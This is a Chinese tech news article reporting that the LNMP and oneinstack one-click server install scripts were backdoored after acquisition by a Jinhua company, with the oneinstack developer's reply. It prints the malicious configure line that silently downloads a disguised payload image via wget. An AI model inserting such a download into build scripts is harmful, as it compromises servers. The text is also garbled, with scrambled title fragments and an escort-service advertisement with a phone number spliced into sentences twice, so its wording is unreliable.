繼LNMP后oneinstack也被添加了后門程序 建議用戶不要使用這類腳本 – 藍點網
9 月下旬,繼L建議腳本國內安全公司發(fā)現(xiàn)知名 Web 集成環(huán)境安裝腳本 “l(fā)nmp 一鍵安裝包” 被投毒,后后門開發(fā)者、也被用戶用類北京漂亮外圍外圍上門外圍女姐上門(微信181-8279-1445)提供1-2線城市外圍上門外圍女,真實可靠快速安排30分鐘到達站長、添加企業(yè) IT 管理員下載的程序一鍵安裝包被加了后門程序。
當時我們都以為這是不使 LNMP 一鍵安裝包的服務器被黑了 (LNMP.org),不過后來有網友發(fā)現(xiàn) LNMP 一鍵安裝包已經被金華市矜貴網絡科技有限公司 (下稱金華矜貴) 收購。藍點
而關于安裝包被投毒問題金華矜貴沒有發(fā)布任何聲明,繼L建議腳本LNMP 論壇的后后門北京漂亮外圍外圍上門外圍女姐上門(微信181-8279-1445)提供1-2線城市外圍上門外圍女,真實可靠快速安排30分鐘到達發(fā)帖也遭到管理員刪除。
現(xiàn)在來看這并不是也被用戶用類服務器被黑了,因為被金華矜貴收購的添加另一個集成環(huán)境安裝腳本 oneinstack 也被發(fā)現(xiàn)投毒,所以情況很明了了:那就是程序根本不是服務器被黑,而是不使他們自己在腳本里插入了惡意代碼,用來下載某些惡意軟件,藍點進而可以控制大量網站或服務器,繼L建議腳本但具體目的尚不清楚。
目前在 GitHub 和 V2EX 上已經有帖子在討論這件事,鑒于金華矜貴還試圖收購秋水逸冰的 lamp.sh 一鍵安裝包 (但被秋大拒絕了),他們后續(xù)可能還會盯上其他一鍵安裝包,因此建議大家不要再使用這類一鍵安裝包,否則自己的網站或服務器可能也會變成肉雞。
更新:oneinstack 開發(fā)者回應稱:金華市矜貴網絡科技有限公司收購現(xiàn)有的幾個面板以及安裝包主要是為了布局類似寶塔的產品。想依賴 oneinstack 打開知名度。公司作為項目的投資商。協(xié)商的協(xié)議為公司為項目提供開發(fā)資金,并提供所有服務器資源。但是項目的管理權限以及運維權限都在我手中。目前各位開發(fā)者的精力主要是進行新的面板開發(fā),對于出現(xiàn)本次被掛馬事故主要原因在于我們沒有對項目進行及時的管理。后續(xù)會加強安全措施。杜絕該問題的出現(xiàn)。
惡意代碼藏在圖片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
詳細請看 GitHub 討論:https://github.com/oneinstack/oneinstack/issues/511
